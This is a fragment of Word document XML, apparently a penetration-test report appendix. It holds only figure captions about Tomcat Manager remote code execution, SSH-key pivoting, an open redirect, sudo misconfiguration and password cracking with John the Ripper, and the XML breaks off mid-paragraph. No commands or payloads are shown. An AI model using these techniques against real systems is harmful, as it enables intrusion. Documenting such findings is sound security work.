    <w:p w14:paraId="288D07CC" w14:textId="179356D5" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="005F3C61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Figure A.10 Remote Code Execution via Tomcat Manager</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC4EE09" w14:textId="77777777" w:rsidR="00471D74" w:rsidRPr="00D77DFE" w:rsidRDefault="00471D74" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16C6B7F8" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="249" w:name="FigureAI11"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F15F7AE" wp14:editId="5C5FF05A">
            <wp:extent cx="4572000" cy="1847042"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1180291088" name="Picture 1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91088" name="Picture 19" descr="A screen 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584152" cy="1851951"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="249"/>
    </w:p>
    <w:p w14:paraId="659ECCA1" w14:textId="0A76E21A" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="005F3C61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Figure A.11 Pivoting via Exposed SSH Private Key</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1539D8F8" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04F7B627" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="250" w:name="FigureAI121"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A6AA768" wp14:editId="68A53285">
            <wp:extent cx="2724150" cy="219075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="18063916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724150" cy="219075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="250"/>
    </w:p>
    <w:p w14:paraId="5C92F65F" w14:textId="0DCCC62E" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="005F3C61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure A.12.1 Open redirect </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>in ,,next</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>” parameter</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E39161" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42D8D6B1" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="251" w:name="FigureAI122"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24900E55" wp14:editId="45828994">
            <wp:extent cx="3790950" cy="304800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12121167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90950" cy="304800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="251"/>
    </w:p>
    <w:p w14:paraId="5818C3D6" w14:textId="03DB982C" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="005F3C61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure A.12.2 Open redirect </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>in ,,next</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>” parameter - Manipulating the parameter</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9FC4AE" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D14BA4C" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="252" w:name="FigureAI123"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BE4BD2C" wp14:editId="4BFEE002">
            <wp:extent cx="4080294" cy="1051039"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2100259659" name="Picture 27" descr="A screenshot of a google search eng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59659" name="Picture 27" descr="A screenshot of a google search engine&#10;&#10;AI-generated content may be incorrect."/>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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4092831" cy="1054268"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="252"/>
    </w:p>
    <w:p w14:paraId="5D530AEE" w14:textId="2E541472" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="005F3C61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure A.12.3 Open redirect </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>in ,,next</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">” parameter </w:t>
      </w:r>
      <w:r w:rsidR="00DB53DF" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Redirected to Google</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687DB03C" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4216486E" w14:textId="77777777" w:rsidR="002D6FEB" w:rsidRDefault="009E22F2" w:rsidP="005F3C61">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="253" w:name="FigureAI13"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39836C19" wp14:editId="63CBF178">
            <wp:extent cx="4580627" cy="1197682"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1300100255" name="Picture 2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00255" name="Picture 26" descr="A screenshot of a computer program&#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593197" cy="1200969"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="253"/>
    </w:p>
    <w:p w14:paraId="6A00A664" w14:textId="6AA128FC" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="005F3C61">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Figure A.13 Sudo Misconfiguration</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673BE5AB" w14:textId="77777777" w:rsidR="005864C8" w:rsidRPr="00D77DFE" w:rsidRDefault="005864C8" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A89236D" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="254" w:name="FigureAI141"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27E4683B" wp14:editId="6A182FFE">
            <wp:extent cx="4580626" cy="1303240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="616663327" name="Picture 2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63327" name="Picture 28" descr="A screenshot of a computer program&#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86240" cy="1304837"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="254"/>
    </w:p>
    <w:p w14:paraId="3180056D" w14:textId="43AE4801" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="005F3C61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure A.14.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Weak Password Hash: Cracked by JtR</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7DB810" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B3AE81B" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="255" w:name="FigureAI142"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="313D6A91" wp14:editId="62AB39E1">
            <wp:extent cx="4287329" cy="1029634"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="431289633" name="Picture 3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9633" name="Picture 30" descr="A screen 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4299620" cy="1032586"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="255"/>
    </w:p>
    <w:p w14:paraId="66887D1F" w14:textId="100D1CE4" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="005F3C61">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2775"/>
        </w:tabs>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
